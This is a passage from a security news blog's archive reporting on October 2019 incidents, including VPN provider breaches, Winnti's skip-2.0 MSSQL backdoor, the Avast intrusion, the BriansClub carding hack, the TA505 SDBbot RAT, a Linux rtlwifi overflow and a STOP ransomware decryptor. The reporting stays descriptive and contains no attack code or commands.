Category Archives: Breaking News

NordVPN, TorGuard, and VikingVPN VPN providers disclose security breaches

NordVPN and TorGuard VPN firms were hacked, threat actors leaked the private keys used to secure their web servers and VPN configuration files. 

Hackers have breached the systems used by NordVPN and TorGuard VPN companies and leaked the private keys used to secure their web servers and VPN configuration files. 

The information belonging to the NordVPN company that was leaked online were stolen from the server of the VPN provider last year.

The attackers leaked at least three private keys that belong to the company, one from an older NordVPN site certificate and two OpenVPN keys.

The certificate is expired in October 2018, a circumstance that suggests that the hack happened last year, but we cannot exclude that the server was storing the key of an outdated certificate.

After the keys were leaked online, experts pointed out that attackers could set up rogue VPN servers and use them yo carry out MiTM attack on the users’ traffic.

Experts at Golem.de remarked that the expired certificate could be used only to carry out a MiTM attack, but it could not have been used to decrypt the traffic.

“You can not decrypt stored VPN traffic directly with the leaked keys. From the configuration files also shown, it shows that the OpenVPN configuration uses a key exchange with Diffie-Hellman, so that the connections have the so-called forward-secrecy property, which prevents subsequent decryption.” reads the post published by golem.de. “The keys could be used for a man-in-the-middle attack. In addition, it can be assumed that the attacker was able to access traffic during the hack.”

nordvpn hacked

NordVPN confirmed the incident that took place in March 2018 when hackers accessed one of the datacenters in Finland operated by a third-party provider.

“A few months ago, we became aware that, on March 2018, one of the datacenters in Finland we had been renting our servers from was accessed with no authorization.” reads the statement published by the VPN provider. “The attacker gained access to the server by exploiting an insecure remote management system left by the datacenter provider. We were unaware that such a system existed. The server itself did not contain any user activity logs; none of our applications send user-created credentials for authentication, so usernames and passwords couldn’t have been intercepted either.”

The company highlighted that the expired TLS key was stored in the breached datacenter in Finland, it couldn’t possibly have been used to decrypt the VPN traffic of any other server. The only possible way to abuse website traffic was by performing a personalized and sophisticated MiTM attack to intercept a single connection that tried to access nordvpn.com. ù

After the incident, NordVPN immediately launched an investigation and terminated the contract with the server provider.

The incident also impacted other VPN providers using the same data center, such as VikingVPN and TorGuard.

TorGuard was the only VPN provider of the three impacted by the incident to be implementing secure PKI management this means that its main CA key was not on the affected VPN server.

“The single TorGuard server that was compromised was removed from our network in early 2018 and we have since terminated all business with the related hosting reseller because of repeated suspicious activity.” reads a statement published by TorGuard.

“TorGuard VPN or proxy traffic was not compromised during this isolated breach of a single VPN server and no sensitive information was compromised during this incident. Even though no security risk past or present was found, TorGuard has reissued all certs earlier this year per our security protocol,”

Pierluigi Paganini

(SecurityAffairs – VPN, hacking)

The post NordVPN, TorGuard, and VikingVPN VPN providers disclose security breaches appeared first on Security Affairs.

Czech Police and Intelligence agency dismantled Russian Spy ring on its soil

Czech police and intelligence services have identified a Russian espionage network operating having a nerve center in its Prague embassy.

Czech police and intelligence services have dismantled a Russian espionage network operating that was operating via its Prague embassy.

The officials were helped by peers at the National Organised Crime Centre (NCOZ).

According to the official, the cyberspies were setting up a structure to hit targets in Czech and abroad.

Michal Koudelka, head of the Czech Republic’s BIS intelligence service, confirmed that the authorities busted the cyber espionage ring that is allegedly part of a larger organization set up by Russia and operating in other European countries.

“The network was completely destroyed and decimated,” Michal Koudelka, said in parliament, quoted by the Czech CTK news agency.

“It was created by people with links to Russian intelligence services and financed from Russia and the Russian embassy,”

In August, a parliamentary committee in the Czech Republic revealed that the National Cyber and Information Security Agency blamed a foreign state for a cyber attack that targeted the Czech Foreign Ministry.

The committee did not reveal the name of the state allegedly involved in the attack. Daily N, the Czech independent daily, has accused Russia multiple times for the attacks against the foreign ministry which took place in June.

According to a report published in September by the NUKIB Czech Intelligence agency, China carried out a major cyber attack on a key government institution in the Czech Republic last year.

The report issued by the NUKIB agency states that the attack “was almost certainly carried out by a state actor or a related group,” and “a Chinese actor” is the main suspect.

Pierluigi Paganini

(SecurityAffairs – Russia, Czech police)

The post Czech Police and Intelligence agency dismantled Russian Spy ring on its soil appeared first on Security Affairs.

Winnti APT group uses skip-2.0 malware to control Microsoft SQL Servers

Security experts have a new malware, dubbed skip-2.0 used by the China-linked APT group to establish a backdoor in Microsoft SQL Server systems.

Security experts at ESET have discovered a new malware, dubbed skip-2.0, used by the Chinese Winnti cyberespionage group to gain persistence on Microsoft SQL Server systems.

The Winnti group was first spotted by Kaspersky in 2013, according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad.

The skip-2.0 malware was used by threat actors to establish a backdoor in MSSQL Server 11 and 12 servers, allowing them to access to any account on the server using a “magic password.” The malicious code is able to remain under the radar thanks to the ability to interact with logging mechanisms.

“Earlier this year, we received a sample of this new backdoor called skip-2.0 by its authors and part of the Winnti Group’s arsenal.” reads the analysis published by ESET researcher Mathieu Tartare. “This backdoor targets MSSQL Server 11 and 12, allowing the attacker to connect stealthily to any MSSQL account by using a magic password – while automatically hiding these connections from the logs. Such a backdoor could allow an attacker to stealthily copy, modify or delete database content.”

The skip-2.0 backdoor has some similarities with other malware in the Winnti Group’s arsenal, such as the PortReuse and ShadowPad backdoors.

The PortReuse backdoor has a modular architecture, experts discovered that its components are separate processes that communicate through named pipes. Experts detected multiple PortReuse variants with a different NetAgent but using the same SK3. Each variant spotted by the experts was targeting different services and ports, including DNS over TCP (53), HTTP (80), HTTPS (443), Remote Desktop Protocol (3389) and Windows Remote Management (5985).

PortReuse was used by the Winnti cyberespionage group to target a high-profile Asian mobile software and hardware manufacturer.

The ShadowPad backdoor is a modular platform that can be used to download and execute arbitrary code on the infected system, create processes, and maintain a virtual file system in the registry,

The remote access capability implemented for the ShadowPad backdoor includes a domain generation algorithm (DGA) for C&C servers which changes every month.

Experts noticed that the three malware use the same VMProtected launcher, the same packer.

The Inner-Loader observed in recent attacks looks for the sqlserv.exe process associated with Microsoft SQL Server, then it injects a payload into this process via the sqllang.dll, giving the malware the ability to hook multiple logging and authentication functions.

“The functions targeted by skip-2.0 are related to authentication and event logging.” continues the analysis.

“The most interesting function is the first one (CPwdPolicyManager::ValidatePwdForLogin), which is responsible for validating the password provided for a given user. This function’s hook checks whether the password provided by the user matches the magic password, in that case, the original function will not be called and the hook will return 0, allowing the connection even though the correct password was not provided.”

Experts pointed out that administrative privileges are required for installing the hooks, this means that skip-2.0 could be delivered only on already compromised MSSQL Servers to achieve persistence.

Pierluigi Paganini

(SecurityAffairs – Winnti, skip-2.0)

The post Winnti APT group uses skip-2.0 malware to control Microsoft SQL Servers appeared first on Security Affairs.

Avast internal network breached for the second time by sophisticated hackers

The popular security firm Avast disclosed today a security breach that impacted its internal network accessed via a compromised VPN profile.

The security firm Avast disclosed today a security breach that impacted its internal network, according to a statement published by the company, the intent of the hackers was to carry out a supply chain attack.

It seems that attackers attempted to inject malicious code in the CCleaner, an attack scenario similar to the one that impacted the company in 2017.

The attack was spotted on September 23, when the Avast experts noticed suspicious behavior on the internal network. The successive investigation involved the Czech intelligence agency, Security Information Service (BIS), the local Czech police force cybersecurity division, and an external forensics team.

The hackers compromised a VPN account to access the internal network of the company. The account did not have domain admin privileges, but hackers successfully got privilege escalation.

Avast pointed out that hackers used compromised credentials through a temporary VPN profile that did not require 2FA.

“The user, whose credentials were apparently compromised and associated with the IP, did not have domain admin privileges. However, through a successful privilege escalation, the actor managed to obtain domain admin privileges. The connection was made from a public IP hosted out of the UK and we determined the attacker also used other endpoints through the same VPN provider.” reads the statement published by Avast.

The analysis of the external IPs used by the attackers revealed that the threat actors had been attempting to gain access to the network through the VPN as early as May 14.

In an attempt to track the attackers, Avast did not close the temporary VPN profile and monitored any access to the internal network until October 15,

“Even though we believed that CCleaner was the likely target of a supply chain attack, as was the case in a 2017 CCleaner breach, we cast a wider net in our remediation actions.” continues the statement.

Avast adopted the following measured to mitigate the incident:

  • On September 25, Avast halted upcoming CCleaner releases and began checking prior CCleaner releases.
  • The company re-signed a clean update of the product and pushed it out to users via an automatic update on October 15.
  • The company revoked the previous certificate.

At the time of writing, it is not possible to determine if this attack was linked to the one that occurred in 2017.

“Having taken all these precautions, we are confident to say that our CCleaner users are protected and unaffected,” concludes the statement.

“From the insights we have gathered so far, it is clear that this was an extremely sophisticated attempt against us that had the intention to leave no traces of the intruder or their purpose, and that the actor was progressing with exceptional caution in order to not be detected. We do not know if this was the same actor as before and it is likely we will never know for sure, so we have named this attempt ‘Abiss’.”

The company, along with law enforcement, is still investigating the incident.

Pierluigi Paganini

(SecurityAffairs – Avast, hacking)

The post Avast internal network breached for the second time by sophisticated hackers appeared first on Security Affairs.

UK/US investigation revealed that Russian Turla APT masqueraded as Iranian hackers

A joint UK and US investigation has revealed that the Russian cyber espionage group Turla carried out cyber attacks masqueraded as Iranian hackers.

According to the Financial Times, a joint UK and US investigation revealed that Russia-linked cyberespionage group Turla conducted several cyber attacks in more than 35 countries masqueraded as Iranian hackers. The use of false flag operations in cyberspace is not a novelty, but this is the first time that Turla APT is adopting a similar strategy.

In 2018, the US intelligence agencies reported that Russian state-sponsored hackers used false flag attacks to hit the Winter Olympics in Pyeongchang, South Korea. At the time the hackers introduced lines of code in their malware associated with North-Korea linked Lazarus Group.

The Turla APT group (aka SnakeUroburosWaterbugVenomous Bear and KRYPTON) has been active since at least 2007 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The list of previously known victims is long and includes also the Swiss defense firm RUAG, US Department of State, and the US Central Command.

Experts involved in the investigation believe that the Turla group hijacked the tools of notorious Iran-linked APT group Oilrig since at least 2014. Its attacks are aligned with the strategic interests of Iran, the group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries.

Multiple attacks targeting of Middle Eastern financial, energy and government, lead FireEye to assess that those sectors are a primary concern of APT34

“The so-called Turla group, which has been linked with Russian intelligence, allegedly hijacked the tools of Oilrig, a group widely linked to the Iranian government, according to a two-year probe by the UK’s National Cyber Security Centre in collaboration with the US’ National Security Agency.” reported the FT.

The two-year investigation was conducted by the UK’s National Cyber Security Centre in collaboration with the US’ National Security Agency.

The experts believe that the Iranian cyberespionage group was unaware that its hacking methods have been hacked and used by another threat actors to hit military establishments, government departments, and universities across the world.

Paul Chichester, director of operations at NCSC explained that this is a major change in the Turla TTPs aimed at making it hard the attribution of the attacks.

“We have never seen this done to the level of sophistication that we are seeing here,” Mr Chichester said. “It’s unique in the complexity and scale and sophistication. It’s actually really hard masquerading [as another entity].” “This is becoming a very crowded space and we do see people innovate quite rapidly in that domain,”

The Russian Government did not respond to a request for comment from the Financial Times, it always denied its involvement in cyber attacks on other states.

In June, Symantec researchers revealed that Russia-Linked cyberespionage group Turla used a new toolset and hijacked command and control infrastructure operated by Iran-Linked OilRig APT.

Experts at Symantec observed in the last eighteen months at least three distinct campaigns, each using a different set of hacking tools. In one campaign the attackers used a previously unseen backdoor tracker as Neptun (Backdoor.Whisperer), the malicious code is deployed on Microsoft Exchange servers and passively listen for commands from the attackers.

Experts noticed that in one attack, Turla hackers used the infrastructure belonging to another espionage group tracked as Crambus (aka OilRigAPT34).  

The three recent Turla campaigns targeted governments and international organizations worldwide.

Unfortunately, Turla and other sophisticated APT groups have the cyber capabilities ùto hijack other state-sponsored groups making it impossible the attribution of the attacks.

Pierluigi Paganini

(SecurityAffairs – Turla, OilRig)

The post UK/US investigation revealed that Russian Turla APT masqueraded as Iranian hackers appeared first on Security Affairs.

Hackers stole card details from BriansClub carding site

BriansClub, one of the biggest a dark web “carding store,” which specializes in the sale of stolen payment card data, has been hacked. 

Hackers have breached BriansClub (BriansClub[.]at), one of the biggest black market sites, that specializes in the sale of stolen credit card data. According to the security experts Brian Krebs, who first reported the data breach, the hackers stole data of more than 26 million payment cards.

Experts estimate the total number of stolen cards leaked from BriansClub represent almost 30 percent of the cards available on the black market.

““BriansClub,” one of the largest underground stores for buying stolen credit card data, has itself been hacked.” reads the post published by Brian Krebs. “The data stolen from BriansClub encompasses more than 26 million credit and debit card records taken from hacked online and brick-and-mortar retailers over the past four years, including almost eight million records uploaded to the shop in 2019 alone.”

Krebs reported that last month, a source shared with him, a file containing the full BriansClub database, the archive included cards currently available for sale and historically data.

The file contains details stolen from bricks-and-mortar retailers over the past four years, including nearly eight million records that were uploaded in 2019 alone.

People who reviewed the stolen data confirmed that the same credit card records could be found in a more redacted form by searching the BriansClub Web site using a valid and funded account.

Historical data in the archive show the rapid growth of the carding site, in 2015 the platform added just 1.7 million card records for sale, in 2016, 2.89 million stolen cards, 4.9 million cards in 2017; and 9.2 million in 2018. Between January and August 2019, BriansClub added approximately 7.6 million cards.

BriansClub acts as a broker of card data stolen by other cyber criminals, resellers or affiliates, who earn a fee from each sale.

BriansClub sold roughly 9.1 million stolen credit cards, allowing the site and its resellers to earn a total of $126 million in sales since 2015.

“There’s no easy way to tell how many of the 26 million or so cards for sale at BriansClub are still valid, but the closest approximation of that — how many unsold cards have expiration dates in the future — indicates more than 14 million of them could still be valid.” states Krebs.

According to a follow-up post published by Krebs, the administrator of BriansClub confirmed that the data center hosting his site had been hacked earlier in the year. The administrator claims that stolen data had been removed from BriansClub store inventories, but multiple sources confirmed they are still available for sale at BriansClub.

According to Krebs, the administrator of the Russian cybercrime forum Verified, BriansClub was hacked by “a fairly established ne’er-do-well who uses the nickname ‘MrGreen’ and runs a competing card shop by the same name.”

“The Verified site admin said MrGreen had been banned from the forum, and added that “sending anything to Krebs is the lowest of all lows” among accomplished and self-respecting cybercriminals. I’ll take that as a compliment.” concludes Krebs.

That said, if the remainder of BriansClub’s competitors want to use me to take down the rest of the carding market, I’m totally fine with that.”

Pierluigi Paganini

(SecurityAffairs – BriansClub, carding)

The post Hackers stole card details from BriansClub carding site appeared first on Security Affairs.

TA505 cybercrime group use SDBbot RAT in recent campaigns

TA505 cybercrime group that operated the Dridex Trojan and Locky ransomware, has been using a new RAT dubbed SDBbot in recent attacks.

Security experts at Proofpoint observed the notorious TA505 cybercrime group that has been using a new RAT dubbed SDBbot in recent attacks.

The TA505 group, that is known to have operated both the Dridex and Locky malware families, continues to make small changes to its operations. TA505 hacking group has been active since 2014 focusing on Retail and banking sectors.

SDBbot is a backdoor that is delivered via a new downloader dubbed Get2 that was written in C++. The dropper was also used to distribute other payloads, including FlawedGrace, FlawedAmmyy, and Snatch.

The new downloader Get2 was first observed in early September when the groups used it in targeted attacks against financial institutions in Greece, Singapore, United Arab Emirates, Georgia, Sweden, Lithuania, and a few other countries.

On September 20, new phishing attacks involved thousands of emails, with English and French lures, attempting to deliver Microsoft Excel and .ISO attachments to targets in the United States and Canada.

The TA505 group started delivering SDBbot in early October, it used weaponized Microsoft Office documents leveraging the Get2 downloader.

“On October 7, instead of directly attached malicious Microsoft Excel files, Proofpoint researchers observed thousands of emails containing URL shortener links redirecting to a landing page that in turn links to an Excel sheet “request[.]xls”. This campaign only used the English language and targeted companies from various industries primarily in the United States.” reads the analysis published by Proofpoint.

SDBbot RAT

SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. It also makes use of application shimming [1] for persistence.

The attackers switched from attachments to shortened URLs that point to a malicious Excel sheet, the attacks mainly targeted organizations in the United States.

Experts discovered that the Get2 downloader also implements information-gathering capabilities. It collects basic system information and sends it back to an hardcoded C&C via an HTTP POST request.

The SDBbot RAT has three main components, an installer, a loader, and a backdoor component.

The installer is used to store the RAT in the registry and establish persistence for the loader, while if the bot is running with admin privileges on a Windows version newer than Windows 7, persistence is established using the registry “image file execution options” method. If the bot is running as admin on Windows XP or 7, persistence is established using application shimming

“All three of the persistence mechanisms require a reboot to take effect and there is no additional code to continue executing the loader and RAT components from the installer. Proofpoint researchers speculate that the reboot functionality in the Get2 downloader (described above) is used to continue SDBbot’s execution after installation in the TA505 campaigns.” continues the analysis.

The loader is used to execute the loader shellcode from the binary blob that is stored in the registry that decompresses the RAT and loads and executes a DLL.

The RAT component supports typical RAT functionalities, including command shell, video recording of the screen, remote desktop, port forwarding, and file system access.

“The new Get2 downloader, when combined with the SDBbot as its payload appears to be TA505’s latest trick (or treat) for the Fall of 2019,” Proofpoint concludes.

Pierluigi Paganini

(SecurityAffairs – SDBbot RAT, TA505)

The post TA505 cybercrime group use SDBbot RAT in recent campaigns appeared first on Security Affairs.

Security Affairs newsletter Round 236

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Hi folk, let me inform you that I suspended the newsletter service, anyway I’ll continue to provide you a list of published posts every week through the blog.

A new Mac malware dubbed Tarmac has been distributed via malvertising campaigns
Alabama Hospital chain paid ransom to resume operations after ransomware attack
Charming Kitten Campaign involved new impersonation methods
Imperva explains how hackers stole AWS API Key and accessed to customer data
Is Emotet gang targeting companies with external SOC?
Privacy advocates criticize Apple for sharing some users browsing data with Tencent
Talos experts found 11 flaws in Schneider Electric Modicon Controllers
Click2Mail suffered a data breach that potentially impacts 200,000 registrants
Global Shipping and mailing services firm Pitney Bowes hit by ransomware attack
sudo flaw allows any users to run commands as Root on Linux
Winnti Group was planning a devastating supply-chain attack against Asian manufacturer
Adobe out-of-band security updates address 82 flaws in 3 products
Approaching the Reverse Engineering of a RFID/NFC Vending Machine
Chinese-speaking cybercrime gang Rocke changes tactics
Signature update for Symantec Endpoint protection crashed many device
Critical and high-severity flaws addressed in Cisco Aironet APs
Cryptocurrency miners infected more than 50% of the European airport workstations
Graboid the first-ever Cryptojacking worm that targets Docker Hub
International operation dismantled largest Dark Web Child abuse site
M6 Group, largest France private multimedia group, hit by ransomware attack
China-linked cyberspies Turbine PANDA targeted aerospace firms for years
Pitney Bowes revealed that its systems were infected with Ryuk Ransomware
Researcher released PoC exploit code for CVE-2019-2215 Android zero-day flaw
Systems at Ingredients provider Ingredion infected with a Malware
Trojanized Tor Browser targets shoppers of Darknet black marketplaces
A critical Linux Wi-Fi bug could be exploited to fully compromise systems
Emsisoft released a free decryption tool for the STOP (Djvu) ransomware
Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post Security Affairs newsletter Round 236 appeared first on Security Affairs.

US Army stopped using floppy disks as storage for SACCS system that manages nuclear weapons arsenal

The news is quite curious, the US military will no longer use 8-inch floppy disks in an antiquated computer (SACCS) to manage nuclear weapons arsenal.

It’s official, the US strategic command has announced that it has replaced the 8-inch floppy disks in an ancient computer to receive nuclear launch orders from the President with a “highly-secure solid state digital storage solution.”

The use of the 8-inch floppy disks was revealed back in 2014 by the CBS “60 Minutes” TV show.

“At long last, that system, the Strategic Automated Command and Control System or SACCS, has dumped the floppy disk, moving to a “highly-secure solid state digital storage solution” this past June, said Lt. Col. Jason Rossi, commander of the Air Force’s 595th Strategic Communications Squadron.” reported c4isrnet.com.

The Strategic Automated Command and Control System (SACCS) is used by US nuclear forces to send orders from command centers to field forces in case of crisis. It is considered totally secure because it is completely isolated from the internet, even if researchers worldwide have demonstrated that there are many ways to breach into an air-gapped network.

The Strategic Automated Command and Control System (SACCS) is a United States Strategic Command command and control system to coordinate the operational functions of United States nuclear forces (ICBMs, nuclear bombers, and SLBMs).

“You can’t hack something that doesn’t have an IP address. It’s a very unique system — it is old and it is very good,” Rossi added.

In June, the US Air Force has replaced the floppy disks in the SACCS nuclear weapons management system with a “highly-secure solid state digital storage solution.”

The system has been operating since 1968 running on an IBM Series/1 mainframe and using 8-inch floppy disks as storage support.

The use of 8-inch floppy disks was also confirmed by a report published by the US Government Accountability Office (GAO).

“Coordinates the operational functions of the United States’ nuclear forces, such as intercontinental ballistic missiles, nuclear bombers, and tanker support aircrafts. This system runs on an IBM Series/1 Computer—a 1970s computing system— and uses 8-inch floppy disks.” states the report.

“The agency plans to update its data storage solutions, port expansion processors, portable terminals, and desktop terminals by the end of fiscal year 2017.”

One of the military working for Lt. Col. Rossi, Robert Norman, a civilian Air Force employee with more than four years of experience fixing the electronics on SACCS, explained that every issue on the ancient system request a dedicated maintenance e often the damaged components are repaired by experts like him.

“Any electronic repair is going to take a lot of work. I shouldn’t say it’s difficult, [but] unfortunately a lot of the newer electronics are plug and play,” he said, explaining that when electronic components like motherboards or microchips break on newer systems, the common practice is to throw out them out and replace them.” Norman told c4isrnet.com. “On SACCS, all of those pieces are repaired — which for maintainers could mean spending hours spent under a microscope, slowly but deliberately replacing a copper wire laced throughout a circuit board, for example. The challenges get a little larger when we’re actually repairing them down to component level,”

Experts pointed out that even if the hardware used by the SACC antiquate, its software is constantly refreshed by young Air Force programmers.

The problem of security for critical defense systems was approached by the US Government several times, According to a report published by the Government Accountability Office (GAO) in October 2018, almost any new weapon systems in the arsenal of the Pentagon is vulnerable to hacking.

According to the 50-page report published by the GAO, several vulnerabilities in the weapon systems were never fixed.

Pierluigi Paganini

(SecurityAffairs – SACCS, hacking)

The post US Army stopped using floppy disks as storage for SACCS system that manages nuclear weapons arsenal appeared first on Security Affairs.

Security Affairs 2019-10-19 23:46:08

Threat actors leverage malicious plugins that hide in plain sight to backdoor WordPress websites and to use them for brute-forcing other sites.

The use of fake WordPress plugins installed by hackers is not a novelty, recently at Sucuri observed multiple infections aimed at installing fake plugins with backdoor capabilities.

Attackers use automated tools to create malicious WordPress plugins or by and include in their code malicious payloads such as web shells.

The researchers spotted some fake plugins with backdoor functionality, two of them named initiatorseo or updrat123 were based on the structure of the popular backup/restore WordPress plugin UpdraftPlus.

The UpdraftPlus WordPress plugin has more than 2 million active installations and its contributors regularly update it.

“While their code differs in terms of variable names, the malicious plugins do share a few things in common: they possess a similar structure along with header comments from the popular backup/restore plugin UpdraftPlus.” reads the post published by Sucuri.

“The metadata comments within these fake plugins include copies from version 1.16.16 of UpdraftPlus, which was released on July 23rd, 2019,” found researchers at web security and protection company Sucuri”

The malicious WordPress plugins hide in the WordPress dashboard and are visible only by anyone who use browsers with specific User-Agent strings that vary from plugin to plugin

The attacker could verify the presence of the malicious plugin using a GET request with custom parameters such as initiationactivity or testingkey.

The fake WordPress plugins allow attackers to establish a backdoor on the compromised sites and to provide them with access to the servers even after the original infection vector was removed.

The backdoors are used to upload arbitrary files for malicious purposes to the compromised servers using POST requests.

“Malicious requests come in the form of POST parameters, which specify a remote URL for the file download locations, along with the path and name of the file to be created on the compromised server.” continues the post.

“So far, the names of these POST parameters have been unique for each plugin that we’ve analyzed.”

Post requests contain parameters such as the URL where are located the payloads to download, or the path where the files should be written on the compromised servers.

Sucuri researchers also observed attackers using fake plugins to upload files with random names (i.e. 5d9196744f88d5d9196744f893.php) to site root directories. These files contain a script that threat actors use to carry out brute force attacks on other sites.

“Hackers want to maintain access to websites as long as they can. To accomplish this, they upload various backdoors into random files scattered across the whole site. Sometimes backdoors come in the form of WordPress plugins that might not even be visible from the admin interface.” concludes Sucuri.

“Additionally, compromised websites may be used for malicious activity that is completely invisible from outside, including DDoS and brute-force attacks, mailing tons of spam, or cryptomining.

Pierluigi Paganini

(SecurityAffairs – WordPress plugins, backdoor)

The post appeared first on Security Affairs.

A critical Linux Wi-Fi bug could be exploited to fully compromise systems

A researcher discovered a critical Linux vulnerability, tracked as CVE-2019-17666, that could be exploited to fully compromise vulnerable machines.

Nico Waisman, principal security engineer at Github, discovered a critical Linux flaw, tracked as CVE-2019-17666, that could be exploited by attackers to fully compromise vulnerable machines.

The vulnerability affects Linux versions through 5.3.6, according to the researchers the issue exists at least since 2015.

The vulnerability is a heap buffer overflow issue that resides in the “rtlwifi” driver that allows certain Realtek Wi-Fi modules to communicate with the Linux operating system.

“rtl_p2p_noa_ie in drivers/net/wireless/realtek/rtlwifi/ps.c in the Linux kernel through 5.3.6 lacks a certain upper-bound check, leading to a buffer overflow.” reads the description published by NVD.

The issue affects a feature called the Notice of Absence protocol implemented in the “rtlwifi” driver. The protocol is used by devices to autonomously power down their radio and save energy.

“The Notice of Absence (NoA) protocol allows a P2P GO to announce time intervals, referred to as absence periods, where P2P Clients are not allowed to access the channel, regardless of whether they are in power save or in active mode. In this way, a P2P GO can autonomously decide to power down its radio to save energy.” reads a paper on Device to device communications.

The expert noticed that the driver fails to correctly handle Notice of Absence packets.

“Nicolas Waisman noticed that even though noa_len is checked for a compatible length it’s still possible to overrun the buffers of p2pinfo since there’s no check on the upper bound of noa_num. Bound noa_num against P2P_MAX_NOA_NUM.” reads the security advisory.

An attacker could use packets with incorrect length to trigger the flaw and cause the system to crash.

An unauthenticated attacker could trigger the flaw only if he is within the radio range of the target device.

“The vulnerability triggers an overflow, which means it could make Linux crash or if a proper exploit is written (which is not trivial), an attacker could obtain remote code-execution,” Waisman explained to the Threatpost.

The Linux kernel team has already developed a fix that is currently under revision, it has not yet been included into the Linux kernel.

Pierluigi Paganini

(SecurityAffairs – Linux Kernel, hacking)

The post A critical Linux Wi-Fi bug could be exploited to fully compromise systems appeared first on Security Affairs.

Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again.

Over 600 million UC Browser and UC Browser Mini Android users have been exposed to man-in-the-middle (MiTM) attacks.

More than 600 million users of the popular UC Browser and UC Browser Mini Android apps have been exposed to man-in-the-middle (MiTM) attacks by downloading an Android Package Kit (APK) from a third party server over unprotected channels.

The UC Browser is developed by UCWeb, a company owned by the Alibaba Group since 2014, and is the world’s fourth most popular mobile browser according to StatCounter.

Researchers at Zscaler were investigating an unusual activity when discovered some questionable connections to a specific domain, 9appsdownloading.. The requests were being made by the popular Browser app. 

Further investigation allowed the researchers to determine that the UC Browser app was attempting to download an additional Android Package Kit (APK) over an unsecured channel (HTTP over HTTPS). This practice violates the Google Play policy, and the use of an unsecured channel exposes the users to man-in-the-middle attacks. The use of unsecured channels could allow attackers to deliver and install an arbitrary payload on a target device to perform a broad range of malicious activities.

The analysis of the APK revealed that it was available on a third-party app store named 9Apps, with the com.mobile.indiapp package name.

Once installed on a device, the 9Apps app started scanning for installed applications and it allowed installing more apps from the third-party app store that were downloaded as APKs from the 9appsdownloading[.]com domain.

UC browser

Researchers also pointed out that dropping an APK on external storage (/storage/emulated/0) could allow other apps, with appropriate permissions, to tamper with the APK.

Zscaler shared its findings to Google on August 13 and the discussion on the potential violation lasted until September 25.

On September 27 Google acknowledged the problems and reported them to UCWeb asking the development team to “update the apps and remediate the policy violation,” UCWeb addressed the issues in its apps.

“It is too early to determine exactly what the Browser developers intended with their third-party APK, but it is clear that they are putting users at risk. And with more than 500 million downloads of UC Browser, that is a significant threat.” concludes the analysis published by ZScaler.

“Because UC Browser downloads an unknown third-party app to devices over unsecured channels, those devices can become victim to man-in-the-middle (MiTM) attacks. Using MiTM, attackers can spy on the device and intercept or change its communications,”

In May, security researcher Arif Khan discovered a browser address bar spoofing flaw in the popular browser apps for Android.

Pierluigi Paganini

(SecurityAffairs – Android, hacking)

The post Hundreds of millions of UC Browser Android Users Exposed to MiTM Attacks. Again. appeared first on Security Affairs.

Emsisoft released a free decryption tool for the STOP (Djvu) ransomware

Emsisoft firm has released a new free decryption tool the STOP (Djvu) ransomware, in the last months the research team helped victims of many other threats.

STOP (Djvu) ransomware has 160 variants that infected more hundreds of thousands of victims worldwide. Experts estimated a total number of 460,000 victims, that makes this threat the most active and widespread ransomware today.

According to data included in Emsisoft Ransomware Statistics report for Q2 and Q3 2019, Djvu ransomware accounts for more than half of all the ransomware submissions throughout the world.

For the first time, a decryptor used a side-channel attack on the ransomware’s keystream.

“We’ll be breaking STOP’s encryption via a side-channel attack on the ransomware’s keystream. As far as we know, it’s the first time this method has been used to recover ransomware-encrypted files on such a large scale.” reads the post published by Emsisoft.

The Divu ransomware encrypts victim’s files with Salsa20, and appends one of dozens of extensions to filenames, such as “.djvu”, “.rumba”, “.radman”, “.gero”, etc.

The price of the private key and decrypt software is $980, victims can receive a 50% discount if they contact the crooks in the first 72 hours.

The Djvu ransomware is mainly delivered through key generators and cracks, experts pointed out that some versions of STOP also bundle additional malicious payloads, including password-stealers.

The decryptor released by Emsisoft can recover for free files encrypted by 148 of the 160 variants, this means that approximately 70% of victims will be able to recover their data. Unfortunately, currently it is not possible to decrypt files encrypted by the remaining 12 variants.

Below key findings shared by the company:

  • The tool will recover files encrypted by 148 of the 160 known STOP variants and will enable approximately 70% of victims to recover their data without paying the ransom.
  • STOP has claimed more victims than any other currently active ransomware: 116k confirmed and 460K estimated.
  • The encryption is being broken via a side-channel attack on the keystream. This will be the first time ransomware has been decrypted this way on such a large scale (as far as we know). 
  • Because of the number of victims, we will not be able to provide one-on-one help for those who need assistance using the tool. The volunteer community at Bleeping Computer has, however, agreed to act as an unofficial support channel for this tool and will be providing help to those who need it. We greatly appreciate their efforts and willingness to help. Some words from Bleeping Computer’s Lawrence Abrams are below. 

Download the STOP Djvu Decryptor here

Pierluigi Paganini

(SecurityAffairs – Djvu ransomware, malware)

The post Emsisoft released a free decryption tool for the STOP (Djvu) ransomware appeared first on Security Affairs.

Systems at Ingredients provider Ingredion infected with a Malware

The US ingredient provider Ingredion Incorporated announced that it has recently detected suspicious activity associated with a malware attack.

The US ingredient provider Ingredion Incorporated revealed to have detected an ongoing malware attack after its experts noticed a suspicious activity this week. Ingredion has hired third-party experts to help its staff in investigating the incident and restoring the affected systems.

At the time of writing, the company did not provide details about the attack, Ingredion only said that there is no evidence that hackers accessed to customer, supplier or employee data.

“The company warns that it has called in external experts to assist with restoring affected servers, and there may be some delays in transactions with customers and suppliers.” reported SecurityWeek.

“The ingredient solutions provider admitted that it “will take time” to restore some of the impacted systems.”

Ingredion

Experts believe that the company was infected with a piece of ransomware.

Recently the global shipping and mailing services company Pitney Bowes suffered a security incident, today the company published an update on the attack and confirmed that the root cause of the disruptions of its services was “the Ryuk virus malware attack.”

Pierluigi Paganini

(SecurityAffairs – Ingredion, malware)

The post Systems at Ingredients provider Ingredion infected with a Malware appeared first on Security Affairs.

Trojanized Tor Browser targets shoppers of Darknet black marketplaces

